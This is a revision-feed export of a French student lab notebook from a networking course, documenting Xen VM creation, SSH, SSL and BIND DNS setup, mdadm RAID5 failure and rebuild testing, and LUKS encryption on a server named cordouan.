                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46212</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46212"/>
				<updated>2017-11-13T12:42:45Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
